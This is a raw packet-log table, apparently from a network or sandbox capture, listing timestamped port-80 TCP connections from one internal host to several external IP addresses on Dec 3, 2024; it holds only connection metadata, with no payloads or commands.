                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.035595894 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.035640955 CET8049770209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.035832882 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:19.362112045 CET4977080192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.378186941 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.547779083 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.547981024 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.550163984 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.719173908 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.724860907 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.724932909 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.725213051 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.725799084 CET4977180192.168.11.20209.74.79.42
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.894625902 CET8049771209.74.79.42192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:25.977830887 CET4977280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:26.115695953 CET8049772208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:26.115915060 CET4977280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:26.119172096 CET4977280192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:26.256906033 CET8049772208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.641840935 CET4977380192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.779418945 CET8049773208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.779562950 CET4977380192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.782742023 CET4977380192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.920288086 CET8049773208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.313174009 CET4977480192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.450964928 CET8049774208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.451113939 CET4977480192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.454380035 CET4977480192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.454447985 CET4977480192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.454464912 CET4977480192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.592045069 CET8049774208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:33.984419107 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.122328997 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.122524977 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.124768972 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.268441916 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872580051 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872597933 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872620106 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872634888 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872802019 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872883081 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872901917 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872916937 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.872931957 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:34.873102903 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016438961 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016459942 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016664982 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016685009 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016705036 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016720057 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016735077 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016832113 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016875982 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016937971 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.016980886 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.017106056 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.160248041 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.160268068 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.160444021 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.160525084 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.160543919 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.160758018 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.160825968 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.160845041 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.161027908 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.161072016 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.161098957 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.161227942 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304189920 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304419994 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304450989 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304466963 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304481983 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304567099 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304629087 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304682016 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304713964 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304728985 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304744005 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304800034 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.304902077 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.448177099 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.448187113 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.448194027 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.448513985 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.449130058 CET4977580192.168.11.20208.91.197.27
                                                                                                                                                                                                                                Dec 3, 2024 14:52:35.586682081 CET8049775208.91.197.27192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.564794064 CET4977680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.757265091 CET804977689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.757523060 CET4977680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.760699987 CET4977680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.953803062 CET804977689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.954447031 CET804977689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.954493046 CET804977689.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.954663038 CET4977680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:42.263328075 CET4977680192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:43.279280901 CET4977780192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:43.479398966 CET804977789.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:43.479631901 CET4977780192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:43.482830048 CET4977780192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:43.683001041 CET804977789.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:43.683319092 CET804977789.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:43.683507919 CET4977780192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:44.996916056 CET4977780192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.013185978 CET4977880192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.205812931 CET804977889.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.206135035 CET4977880192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.209362030 CET4977880192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.209451914 CET4977880192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.401959896 CET804977889.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.402106047 CET804977889.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.402591944 CET804977889.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.402600050 CET804977889.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:46.402837038 CET4977880192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:47.715431929 CET4977880192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:48.731208086 CET4977980192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:48.923839092 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:48.924015999 CET4977980192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:48.926189899 CET4977980192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.118737936 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.118822098 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119079113 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119291067 CET4977980192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119296074 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119348049 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119390965 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119434118 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119467974 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.119620085 CET4977980192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.120309114 CET4977980192.168.11.2089.31.143.90
                                                                                                                                                                                                                                Dec 3, 2024 14:52:49.312731981 CET804977989.31.143.90192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.504808903 CET4978080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.829539061 CET80497808.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.829709053 CET4978080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.832865953 CET4978080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:52:56.160278082 CET80497808.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:56.160330057 CET80497808.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:56.160363913 CET80497808.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:56.160542011 CET4978080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:52:57.337990046 CET4978080192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:52:58.354058027 CET4978180192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:52:58.679277897 CET80497818.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:58.679451942 CET4978180192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:52:58.682605028 CET4978180192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:52:59.006607056 CET80497818.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:59.006656885 CET80497818.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:59.006691933 CET80497818.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:59.006807089 CET4978180192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:00.196705103 CET4978180192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.212865114 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.553941965 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.554177046 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.557466030 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.557502031 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.557573080 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898515940 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898544073 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898566008 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898837090 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898861885 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.898880005 CET80497828.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:01.899070024 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:03.071142912 CET4978280192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.087148905 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.464951038 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.465176105 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.467344999 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.844850063 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.844867945 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.844880104 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.845268011 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:04.845868111 CET4978380192.168.11.208.136.96.106
                                                                                                                                                                                                                                Dec 3, 2024 14:53:05.223275900 CET80497838.136.96.106192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:09.969978094 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.289215088 CET804978438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.289499044 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.293055058 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.612169027 CET804978438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.612310886 CET804978438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.612395048 CET804978438.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:10.612514019 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:11.803602934 CET4978480192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:12.819644928 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.138928890 CET804978538.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.139122009 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.142272949 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.461798906 CET804978538.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.461844921 CET804978538.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.461878061 CET804978538.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:13.462095976 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:14.646752119 CET4978580192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.662822008 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.981611967 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.981825113 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.985086918 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:15.985142946 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304090977 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304142952 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304173946 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304487944 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304717064 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.304961920 CET804978638.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:16.305207014 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:17.489775896 CET4978680192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:18.505901098 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:18.825035095 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:18.825238943 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:18.827400923 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.146469116 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.146908045 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.147025108 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.147305012 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.147897959 CET4978780192.168.11.2038.47.233.4
                                                                                                                                                                                                                                Dec 3, 2024 14:53:19.466891050 CET804978738.47.233.4192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.338773012 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.506644964 CET8049788103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.506814957 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.509988070 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.700347900 CET8049788103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.700395107 CET8049788103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.700544119 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:26.019232988 CET4978880192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.035233974 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.203289986 CET8049789103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.203465939 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.206959963 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.401585102 CET8049789103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.401593924 CET8049789103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:27.401782036 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:28.723515987 CET4978980192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.737821102 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.905785084 CET8049790103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.905966997 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.909235001 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.909264088 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:29.909336090 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:30.084804058 CET8049790103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:30.117734909 CET8049790103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:30.117752075 CET8049790103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:30.117901087 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:31.424282074 CET4979080192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.440285921 CET4979180192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.608268023 CET8049791103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.608407974 CET4979180192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.610766888 CET4979180192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.805866003 CET8049791103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.805881977 CET8049791103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.805895090 CET8049791103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.806121111 CET4979180192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.806894064 CET4979180192.168.11.20103.224.182.242
                                                                                                                                                                                                                                Dec 3, 2024 14:53:32.974756956 CET8049791103.224.182.242192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.118611097 CET4979280192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.221163034 CET8049792172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.221448898 CET4979280192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.224631071 CET4979280192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.327181101 CET8049792172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.363487005 CET8049792172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.363590002 CET8049792172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.363729000 CET4979280192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.364845037 CET8049792172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.365046024 CET4979280192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:47.733104944 CET4979280192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.749219894 CET4979380192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.851829052 CET8049793172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.851991892 CET4979380192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.855215073 CET4979380192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.959176064 CET8049793172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.988478899 CET8049793172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.988488913 CET8049793172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.988646984 CET4979380192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.989147902 CET8049793172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:48.989375114 CET4979380192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:50.357532024 CET4979380192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.373670101 CET4979480192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.476613998 CET8049794172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.476799965 CET4979480192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.480022907 CET4979480192.168.11.20172.67.201.49
